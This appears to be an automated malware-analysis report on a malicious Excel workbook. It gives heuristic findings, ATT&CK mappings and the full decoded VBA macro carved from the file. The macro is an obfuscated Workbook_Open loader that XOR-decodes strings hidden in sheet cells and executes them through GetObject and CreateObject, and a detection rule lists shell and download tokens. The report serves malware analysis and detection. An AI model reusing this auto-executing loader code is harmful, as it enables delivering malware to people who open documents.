MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Workbook_Open subroutine, which is a common technique for executing malicious code upon opening an Office document. The high-severity heuristics indicate the use of CreateObject and GetObject, suggesting the macro attempts to instantiate and run external objects. The Workbook_Open macro is designed to execute a command that likely downloads and runs a secondary payload.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0 -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4770 bytes |
SHA-256: 8ac0a1f72a4eecaa4dc991cf435f8cc5dc05f21eb0799e0eb9d9cd0f229c197d |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Losing As String
Private CorrespondenCe As String
Private Weekends As String
Private Corps As String
Private Sub EvaluatEd()
Dim Evans As String, InteractIons As Variant, Broadcasting As String, DeemeD As String
GoTo InteractIons
Comply:
Evans = DilDos(Losing): InteractIons = DilDos(CorrespondenCe): Broadcasting = DilDos(Weekends): DeemeD = DilDos(Corps)
GoTo Locked
InteractIons:
Losing = Sheets("ce94").Range("H142").Value: CorrespondenCe = Sheets("ce94").Range("E196").Value: Weekends = Sheets("ce94").Range("E106").Value: Corps = Sheets("ce94").Range("J127").Value
GoTo Comply
Locked:
GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0
End Sub
Sub Workbook_Open()
GoTo Hiking
Dim Hospitality As String
Hospitality = InputBox("Calculated value")
MsgBox Hospitality
Hiking:
If Hospitality = "" Then
EvaluatEd
End If
End Sub
Private Function DilDos(ByVal Walked As String) As Variant
Dim SwitcheS As Long: SwitcheS = 0: Dim Panels() As Byte: Dim SoutheaSt() As Byte, IntensIve As String, Legacy As Integer
SoutheaSt = "t1e928eaae"
GoTo NormaN
Cheat:
Dim Pleasant As String
Pleasant = InputBox("Calculate value")
CamCorders:
If SwitcheS < UBound(Panels) Then
Legacy = SwitcheS Mod (10)
GoTo Evans
InteractIons:
IntensIve = IntensIve & Chr(Panels(SwitcheS))
SwitcheS = SwitcheS + 1
GoTo CamCorders
Else
GoTo Scanner
End If
DiamonDs:
MsgBox "error -34556"
Dim Hospitality As String
Hospitality = InputBox("error report")
MsgBox Hospitality
Scanner:
DilDos = IntensIve
Exit Function
NormaN:
Panels = Portrait(Walked)
GoTo CamCorders
Evans:
Panels(SwitcheS) = Abs(Panels(SwitcheS) Xor SoutheaSt(Legacy * 2))
GoTo InteractIons
End Function
Private Function Portrait(ByVal DiamonDs As String) As Variant
Dim IntensIve() As Byte, i As Long, Legacy As Integer
i = 0: ReDim IntensIve(0 To (Len(DiamonDs) / 2)) As Byte
Hospitality:
If i < Len(DiamonDs) Then
Legacy = Legacy + 1
IntensIve(Legacy - 1) = Chr(14 + ((8 + 4) * 2)) & "H" & Mid(DiamonDs, i + (59 - 50 - 8), 2)
i = i + 2
GoTo Hospitality
Else
GoTo Pleasant
End If
Pleasant:
Portrait = IntensIve
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.